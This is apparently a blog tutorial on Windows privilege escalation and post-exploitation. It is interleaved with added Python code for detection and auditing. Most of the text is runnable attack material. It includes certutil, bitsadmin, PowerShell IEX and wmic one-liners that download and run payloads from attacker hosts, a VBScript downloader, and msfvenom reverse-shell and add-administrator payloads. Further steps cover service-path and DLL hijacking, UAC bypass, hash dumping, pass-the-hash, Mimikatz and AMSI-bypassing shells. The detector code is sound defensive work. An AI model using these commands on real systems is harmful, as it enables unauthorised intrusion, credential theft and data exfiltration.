Windows Manual Escalation
Introduction
In this blog post, we will discuss some manual techniques to escalate privileges once we have obtained standard (low-privilege) user access in the target network.
Windows File Transfer utilities
We will discuss some utilities that can download remote payloads and execute them in order to perform malicious actions on the target system.
Certutil
Certutil is a CLI program that can be used to dump and display certificate authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates, key pairs, and certificate chains. It is installed as part of Certificate Services.
How can we use it to download malicious files and evade antivirus on the target system?
A simple command to download malicious files and payloads from a remote server.
You can create payloads using msfvenom, Veil, Evilgrade or other tools.
certutil -urlcache -split -f http://hacker.com/malicious.exe malicious.exe
-urlcache: display or delete URL cache entries
-split: split embedded ASN.1 elements and save them to files
-f: force overwrite
To download an encoded payload from a remote server onto the target and execute it as an .exe:
certutil -urlcache -split -f http://webserver/malicious.b64 malicious.b64 & certutil -decode malicious.b64 malicious.exe & malicious.exe
Download the encoded payload, decode it, and chain the commands on one line, with InstallUtil.exe executing the resulting DLL as the payload.
certutil -urlcache -split -f http://hacker/malicious.b64 malicious.b64 & certutil -decode malicious.b64 malicious.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u malicious.dll
Bitsadmin
Background Intelligent Transfer Service (BITS) is a component of Microsoft Windows XP and later versions of the operating system that facilitates asynchronous, prioritized, and throttled transfer of files between machines using idle network bandwidth.
To download files from a remote server:
bitsadmin /transfer hacker http://hacker.com/evil.pe c:\System32\evil.exe
We can also execute the payload using bitsadmin:
bitsadmin /addfile hacker http://hacker.com/evil.pe c:\System32\evil.exe
bitsadmin /SetNotifyCmdLine evil.exe /complete hacker | start /B C:\evil.exe
Cscript
cscript.exe is Microsoft's console-based script host and belongs to Windows Script Host. With cscript.exe, you can run scripts by typing the name of a script file at the command prompt.
cscript //E:jscript \\webdavserver\folder\payload.txt
Create a VBScript downloader (wget.vbs) with echo:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
And execute it:
cscript wget.vbs http://attackerIP/hacker.exe hacker.exe
Powershell IEX
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
Wmic
wmic os get /format:"https://hacker/hacker.xsl"
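Each of the one-liners above (certutil, bitsadmin, cscript, PowerShell IEX, wmic XSL) leaves a distinctive process command line, which is what a blue team keys on. The following detection is an added example, not code from the original post: it matches constructed Sysmon-style process-creation events against those patterns; the rule names and the event dict layout are assumptions of this example.

```python
import re

# One rule per living-off-the-land pattern shown in the sections above.
# (rule name, compiled regex applied to the full process command line)
RULES = [
    ("certutil_download", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)),
    ("certutil_decode", re.compile(r"\bcertutil(\.exe)?\b.*-decode\b", re.I)),
    ("bitsadmin_transfer", re.compile(r"\bbitsadmin(\.exe)?\b.*/(transfer|addfile|setnotifycmdline)\b", re.I)),
    ("cscript_remote", re.compile(r"\bcscript(\.exe)?\b.*(//E:\w+|\\\\[^\s\\]+\\)", re.I)),
    ("powershell_iex", re.compile(r"\bpowershell(\.exe)?\b.*\b(iwr|Invoke-WebRequest|DownloadString|Net\.WebClient)\b.*\b(iex|Invoke-Expression)\b", re.I)),
    ("wmic_xsl", re.compile(r"\bwmic(\.exe)?\b.*/format:\s*.?https?://", re.I)),
    ("installutil_uninstall", re.compile(r"\bInstallUtil(\.exe)?\b.*\s/u\b", re.I)),
]

def scan_command_line(cmdline):
    """Names of every rule the command line matches (empty list for benign lines)."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan_events(events):
    """Run all rules over process-creation events; returns (image, cmdline, rules) for hits only."""
    hits = []
    for ev in events:
        matched = scan_command_line(ev["cmdline"])
        if matched:
            hits.append((ev["image"], ev["cmdline"], matched))
    return hits

# Constructed sample events (the page's one-liners plus two benign uses), not real telemetry.
SAMPLE_EVENTS = [
    {"image": "certutil.exe", "cmdline": "certutil -urlcache -split -f http://hacker.com/malicious.exe malicious.exe"},
    {"image": "cmd.exe", "cmdline": r"cmd /c certutil -urlcache -split -f http://hacker/malicious.b64 malicious.b64 & certutil -decode malicious.b64 malicious.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u malicious.dll"},
    {"image": "bitsadmin.exe", "cmdline": r"bitsadmin /transfer hacker http://hacker.com/evil.pe c:\System32\evil.exe"},
    {"image": "cscript.exe", "cmdline": r"cscript //E:jscript \\webdavserver\folder\payload.txt"},
    {"image": "powershell.exe", "cmdline": "powershell -exec bypass -c \"(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex\""},
    {"image": "wmic.exe", "cmdline": 'wmic os get /format:"https://hacker/hacker.xsl"'},
    {"image": "certutil.exe", "cmdline": "certutil -verify -urlfetch server.cer"},  # benign certificate check
    {"image": "bitsadmin.exe", "cmdline": "bitsadmin /list /allusers"},              # benign job listing
]
```

The chained cmd.exe line fires three rules at once, which is a useful correlation signal on its own.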
SMB
smbclient //server/share -c 'cd c:/remote/path ; put local-file remote-file'
Start the SMB server on the attacker's Linux machine using Impacket:
smbserver.py shareName sharePath
On the Windows target machine:
C:\>net use \\[host]\[share name]
If you're in a meterpreter shell, you can do many things very easily; it has many commands and run modules.
To see the commands in meterpreter:
help
To see the run commands:
run <Tab> <Tab>
To upload a payload or malicious files to the Windows system via meterpreter:
upload <filename>
There are many other utilities we can use to transfer files to a Windows system.
After exploitation and post-enumeration, the question is: what have we found?
- Have we found a kernel exploit for the target system?
- Have we found unquoted service paths?
- Have we found credentials or hashes?
- Have we found any service running on localhost?
- Have we found a public exploit for any service?
- Have we found insecure registry permissions?
- Have we found VNC/RDP/Citrix sessions, so that we can try UAC bypasses?
- What permissions do we have?
- etc.
Migrate meterpreter shell to another process
To migrate your current meterpreter session to another process and establish a stable session:
run post/windows/manage/migrate
Or, in the meterpreter shell:
migrate <PID>
Easy Way To Get a System Shell
In the meterpreter shell, there is a command that simply gets you a system shell:
getsystem
It tries all available techniques to get a SYSTEM shell on the target system.
To specify a particular technique:
getsystem -t 1
Here '-t' selects the technique.
Exploit Unquoted Path Service
This technique exploits a service whose executable (PE, Portable Executable) path contains a space and is not enclosed in quotes (""). If we also have write permission on that path, we can replace the executable.
First, we have to enter a Windows shell to execute cmd commands:
shell
After enumerating unquoted service paths with the post-enumeration command
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
we have found a vulnerable service executable, 'Exploitme.exe'.
We will create an msfvenom payload to replace that vulnerable PE:
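The findstr chain above is easy to eyeball on one host; the following Python is an added example (not the author's code) that applies the same filter (Auto start, outside C:\Windows, unquoted path containing a space) to constructed wmic output and lists the path prefixes CreateProcess tries in turn, which are exactly the locations an administrator must keep non-writable. The sample table, service names and paths are constructed for this example.

```python
import re

# Constructed sample of `wmic service get name,displayname,pathname,startmode` output
# (wmic prints the columns alphabetically, padded to fixed widths).
def _row(display, name, path, mode):
    return display.ljust(23) + name.ljust(12) + path.ljust(45) + mode

SAMPLE_WMIC_OUTPUT = "\n".join([
    _row("DisplayName", "Name", "PathName", "StartMode"),
    _row("Exploit Me Service", "Exploitme", r"C:\Program Files\Exploit Me\Exploitme.exe", "Auto"),
    _row("Windows Update", "wuauserv", r"C:\Windows\system32\svchost.exe -k netsvcs", "Auto"),
    _row("Quoted Vendor Service", "QuotedSvc", r'"C:\Program Files\Vendor App\svc.exe" -run', "Auto"),
    _row("Manual Thing", "ManualSvc", r"C:\Program Files\Manual Thing\manual.exe", "Manual"),
])

def parse_wmic_table(text):
    """Split wmic's fixed-width table into dicts using the header's column offsets."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    cols = [(m.group(), m.start()) for m in re.finditer(r"\S+", lines[0])]
    rows = []
    for ln in lines[1:]:
        row = {}
        for i, (name, start) in enumerate(cols):
            end = cols[i + 1][1] if i + 1 < len(cols) else len(ln)
            row[name] = ln[start:end].strip()
        rows.append(row)
    return rows

EXE_RE = re.compile(r"^(.*?\.exe)", re.I)

def unquoted_exe(pathname):
    """Executable portion of the path if it is unquoted and contains a space, else None."""
    p = pathname.strip()
    if p.startswith('"'):
        return None
    m = EXE_RE.match(p)
    exe = m.group(1) if m else p.split(" ")[0]
    return exe if " " in exe else None

def candidate_paths(exe):
    """Paths CreateProcess tries, in order, for an unquoted executable path with spaces."""
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))] + [exe]

def find_unquoted_auto_services(rows):
    """Same filter as the wmic | findstr pipeline: Auto start, outside C:\\Windows, unquoted
    path with spaces. Returns (service name, candidate paths to audit for write access)."""
    findings = []
    for row in rows:
        if row["StartMode"].lower() != "auto" or row["PathName"].lower().startswith("c:\\windows\\"):
            continue
        exe = unquoted_exe(row["PathName"])
        if exe:
            findings.append((row["Name"], candidate_paths(exe)))
    return findings
```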
msfvenom -p windows/meterpreter/reverse_tcp lhost=<AttackerIP> lport=<port> prependmigrate=true prependmigrateprocess=explorer.exe -f exe > /root/home/Desktop/Exploitme.exe
Or we can create a payload that directly adds a user to the Administrators group:
msfvenom -p windows/exec CMD='net localgroup administrators boss /add' -f exe > /root/home/Desktop/Exploitme.exe
In the target shell:
move Exploitme.exe Exploitme.exe.1
upload /root/Desktop/Exploitme.exe
reboot
or
sc stop "Exploitme.exe"
sc start "Exploitme.exe"
And start your multi/handler listener to get a SYSTEM shell:
use exploit/multi/handler
msf exploit(multi/handler) set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost <AttackerIP>
msf exploit(multi/handler) set lport <port>
msf exploit(multi/handler) exploit
DLL Hijacking
Whenever an application starts in Windows it looks for DLLs (Dynamic Link Libraries), because they contain data, code, or resources the application needs to run.
When an application needs to load a DLL, it looks in the following locations, in this order:
- The directory from which the application is loaded
- C:\Windows\System32
- C:\Windows\System
- C:\Windows
- The current working directory
- Directories in the system PATH environment variable
- Directories in the user PATH environment variable
What if we place a malicious DLL in that path? Whenever the application looks for the DLL, it will load the malicious payload DLL, which gives us a reverse shell.
First, we have to identify a process in which an application looks for a DLL that is not found, using the Process Monitor tool.
We found a service 'Hijackme.exe' which is looking for hacker.dll.
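The search order above decides which copy of a DLL wins. The following Python is an added example (not from the original post) that walks that order for the constructed 'Hijackme.exe' scenario and reports the standard-user-writable directories searched before the real DLL, or all of them when the DLL is never found, which is the condition Process Monitor reveals. All paths, the file set and the writable-directory set are assumptions of this example.

```python
import ntpath

# Constructed audit scenario for the 'Hijackme.exe' case above (assumed paths, not a real host).
APP_DIR = r"C:\Program Files\Hijackme"
CWD = r"C:\Users\alice"
SYSTEM_PATH = r"C:\Windows\System32;C:\Windows;C:\Tools"
USER_PATH = r"C:\Users\alice\bin"
EXISTING_FILES = {r"C:\Program Files\Hijackme\Hijackme.exe", r"C:\Windows\System32\version.dll"}
WRITABLE_DIRS = {r"C:\Users\alice", r"C:\Tools", r"C:\Users\alice\bin"}  # writable by a standard user

def _key(path):
    """Case-insensitive, trailing-backslash-insensitive comparison key for Windows paths."""
    return ntpath.normcase(path.rstrip("\\"))

def dll_search_order(app_dir, cwd, system_path, user_path, windir=r"C:\Windows"):
    """Directories searched, in order, with SafeDllSearchMode on (the default), as listed above."""
    order = [app_dir, ntpath.join(windir, "System32"), ntpath.join(windir, "System"), windir, cwd]
    order += [d for d in system_path.split(";") if d] + [d for d in user_path.split(";") if d]
    seen, result = set(), []
    for d in order:  # keep only the first occurrence of each directory
        if _key(d) not in seen:
            seen.add(_key(d))
            result.append(d)
    return result

def resolve_dll(dll_name, order, existing_files):
    """Directory that satisfies the load (first hit in the order), or None if no copy exists."""
    present = {_key(p) for p in existing_files}
    for d in order:
        if _key(ntpath.join(d, dll_name)) in present:
            return d
    return None

def shadowing_dirs(dll_name, order, existing_files, writable_dirs):
    """Standard-user-writable directories searched before the real DLL. If the DLL is never
    found (Process Monitor's NAME NOT FOUND case), every writable directory in the order counts."""
    real = resolve_dll(dll_name, order, existing_files)
    writable = {_key(d) for d in writable_dirs}
    ahead = []
    for d in order:
        if real is not None and _key(d) == _key(real):
            break
        ahead.append(d)
    return [d for d in ahead if _key(d) in writable]

def audit_hijackme():
    """Audit hacker.dll (never shipped) and version.dll (lives in System32) for Hijackme.exe."""
    order = dll_search_order(APP_DIR, CWD, SYSTEM_PATH, USER_PATH)
    return {name: shadowing_dirs(name, order, EXISTING_FILES, WRITABLE_DIRS)
            for name in ("hacker.dll", "version.dll")}
```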
Let's exploit the DLL hijacking.
Create a DLL payload using msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<AttackerIP> -f dll > hacker.dll
Upload the payload to the target system and place it in the DLL search path.
After that, start multi/handler on the attacker system and exploit.
Boom!!!
You will get a shell as an administrator.
Meterpreter also has an extension called 'Incognito' with which we can impersonate other valid user tokens on that machine and become that user.
In the meterpreter shell, use the command below:
use incognito
UAC Bypass Using Meterpreter
User Account Control or UAC for short is a security feature of Windows which helps prevent unauthorized changes to the operating system.
Let's check whether UAC is enabled on the target system.
Use the metasploit module
post/windows/gather/win_privs
After confirming, let's bypass it.
search bypassuac
There are many exploits; choose as per your requirement.
exploit/windows/local/bypassuac_comhijack
Set the options and exploit, and you will get a shell as admin.
Pass The Hash
Pass The Hash is a technique by which you can exploit a system directly using its LM hash.
If you're in a meterpreter shell you can run the commands below:
run hashdump
or smart_hashdump, like
post/windows/gather/smart_hashdump
Or you can search for other techniques in metasploit:
search hashdump
Choose what you need.
And if you are in a regular netcat or cryptcat shell, upload Impacket's secretsdump.py module and execute it on the target system; it will get you the hashes.
Now you can use psexec.py and wmiexec.py to get system access; please check the Impacket blog post to learn this approach.
Metasploit also has psexec: search for it, set the options and exploit.
You can also get RDP access using the hash.
xfreerdp
Check whether xfreerdp is on your system, or install it.
xfreerdp --help
And use the pass-the-hash technique:
xfreerdp /u:victim /d:Target /pth:<HASH> /v:<victimIP>
We can also use Mimikatz, which allows us to extract plaintext passwords and Kerberos tickets, perform pass-the-hash attacks, and much more.
You can also load it in the meterpreter shell:
load mimikatz
And run:
wdigest
Evil-WinRM https://github.com/Hackplayers/evil-winrm
This shell is the ultimate WinRM shell for hacking/pentesting. WinRM (Windows Remote Management) is the Microsoft implementation of the WS-Management Protocol, a standard SOAP-based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in its operating systems to make life easier for system administrators. This program can be used on any Microsoft Windows server with this feature enabled (usually on port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used for legitimate purposes by system administrators as well, but most of its features are focused on hacking/pentesting.
Features
- Compatible with Linux and Windows client systems
- Load in memory Powershell scripts
- Load in memory dll files bypassing some AVs
- Load in memory C# (C Sharp) assemblies bypassing some AVs
- Load x64 payloads generated with awesome donut technique
- AMSI Bypass
- Pass-the-hash support
- Kerberos auth support
- SSL and certificates support
- Upload and download files showing progress bar
- List remote machine services without privileges
- Command History
- WinRM command completion
- Local files completion
- Colorization on prompt and output messages (can be disabled optionally)
- Docker support (prebuilt images available at Dockerhub)
- Trap capturing to avoid accidental shell exit on Ctrl+C
Usage: evil-winrm -i IP -u USER -s SCRIPTS_PATH -e EXES_PATH [-P PORT] [-p PASS] [-U URL]
-i, --ip IP Remote host IP or hostname (required)
-P, --port PORT Remote host port (default 5985)
-u, --user USER Username (required)
-p, --password PASS Password
-s, --scripts PS_SCRIPTS_PATH Powershell scripts path (required)
-e, --executables EXES_PATH C# executables path (required)
-U, --url URL Remote url endpoint (default /wsman)
-V, --version Show version
-h, --help Display this help message
Installation
gem install evil-winrm
Usage
$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!'
Using hash
$ evil-winrm -i 192.168.1.100 -u Administrator -H <LM_HASH>
After getting successful admin access, gather as much information about the system as you can: run the arp and route commands for network mapping, and use the Metasploit post/gather modules to exfiltrate data from the target system.
Gather everything you can.
Conclusion
In this blog post we have discussed some basic Windows post-exploitation techniques; we will learn more in the Red Teaming series.